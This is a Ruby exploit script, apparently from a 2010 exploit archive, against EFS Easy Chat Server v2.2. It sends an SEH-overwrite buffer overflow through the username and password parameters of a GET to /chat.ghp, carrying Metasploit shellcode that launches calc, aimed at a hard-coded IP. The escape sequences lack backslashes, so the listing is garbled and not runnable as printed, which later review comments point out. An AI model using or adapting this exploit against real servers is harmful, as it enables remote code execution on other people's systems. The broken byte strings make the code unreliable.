# Title : Exploit EFS Software Easy Chat Server v2.2
# Published : 2010-01-18
# Author : John Babio
#!/usr/bin/ruby
# Author: John Babio
# Tested on: [Windows XP Sp3 Eng]
require 'net/http'
require 'uri'
require 'socket'
# NOTE(review): every string literal below is printed without backslashes
# ("xeb" rather than "\xeb"), so as shown Ruby would send the ASCII letters
# and digits, not the byte values the author intended. The listing looks
# extraction-garbled and is not runnable as printed; it is left byte-identical.
jmp = "xebx06x90x90"
ppr = "xa2xb9 1x10" #SSLEAY32.dll pop ebx, pop ebp, ret -- the literal contains a stray space, presumably lost in extraction as well
#win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
# Metasploit-generated payload as described on the line above; this script
# does nothing with it except concatenate it into `buffer`.
shellcode = "x2bxc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x86" +
"x49xaex6ax83xebxfcxe2xf4x7axa1xeax6ax86x49x25x2f" +
"xbaxc2xd2x6fxfex48x41xe1xc9x51x25x35xa6x48x45x23" +
"x0dx7dx25x6bx68x78x6exf3x2axcdx6ex1ex81x88x64x67" +
"x87x8bx45x9exbdx1dx8ax6exf3xacx25x35xa2x48x45x0c" +
"x0dx45xe5xe1xd9x55xafx81x0dx55x25x6bx6dxc0xf2x4e" +
"x82x8ax9fxaaxe2xc2xeex5ax03x89xd6x66x0dx09xa2xe1" +
"xf6x55x03xe1xeex41x45x63x0dxc9x1ex6ax86x49x25x02" +
"xbax16x9fx9cxe6x1fx27x92x05x89xd5x3axeexb9x24x6e" +
"xd9x21x36x94x0cx47xf9x95x61x2axcfx06xe5x49xaex6a"
# 216 filler characters, then `jmp`, `ppr` and the payload, in that order.
# The 216 is a fixed value found for the build named in the header
# (Windows XP SP3); nothing in this file derives it.
buffer = "x41" * 216 + jmp + ppr + shellcode
# Hard-coded target host; no port is given, so URI supplies the http default (80).
url = URI.parse('http://10.10.99.12')
# One GET to /chat.ghp with `buffer` placed in both the username and the
# password parameters. `buffer` is never URL-encoded, so its characters go
# straight into the request line. For log review: a /chat.ghp request whose
# username/password parameters are a long run of one repeated character
# (here 216 of them) is the visible trace of this attempt on the server side.
res = Net::HTTP.start(url.host, url.port) {|http|
http.get('/chat.ghp?username=' +buffer+ '&password=' +buffer+ '&room=1&sex=2')
}
# Echoes the response body when the server answers; if the connection is
# dropped before a response arrives, Net::HTTP will likely raise instead and
# nothing is printed.
puts res.body